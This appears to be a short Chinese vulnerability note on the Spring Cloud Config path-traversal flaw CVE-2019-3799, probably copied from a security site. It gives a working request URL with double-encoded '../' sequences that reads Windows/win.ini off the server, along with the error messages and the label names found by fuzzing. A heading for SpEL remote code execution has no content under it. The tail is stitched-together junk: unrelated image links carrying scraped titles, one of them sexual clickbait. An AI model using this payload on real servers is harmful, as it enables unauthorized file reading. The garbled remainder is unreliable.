1.spring cloud config 跨目录文件读取(CVE-2019-3799):
参考:
测试环境下载:https://github.com/spring-cloud/spring-cloud-config/releases?after=v1.4.7.RELEASE
根据官方文档,可以通过如下请求GET /{name}/{profile}/{label}/{path} 来获取配置文件,name,profile和label的含义与常规环境下的endpoint相同,而path是指文件名。
http://127.0.0.1:8888/admin/env/master/..%252f..%252f..%252f..%252f..%252f..%252fWindows%252Fwin.ini
如果label不存在则会提示如下:
>No such label: env
或者:
Cannot load environment
fuzz出来lable:
test、master、head等
MSF测试:
参考https://www.xd10086.com/posts/1808713361549490810/
2、远程代码执行SpEL RCE
![idea 报错[49,55] 编码GBK的不可映射字符-微慑信息网-VulSee.com](https://vulsee.com/wp-content/uploads/2023/06/a33e811a0c0b10dff0ef8f55b265e085.png)
![[八卦] 王婷婷—揭秘一个大三女生的性爱录像-微慑信息网-VulSee.com](http://free.86hy.com/crack/pic/1.jpg)
![[随笔]今天国际警察节-微慑信息网-VulSee.com](http://photo.sohu.com/20041017/Img222528326.jpg)
青云网
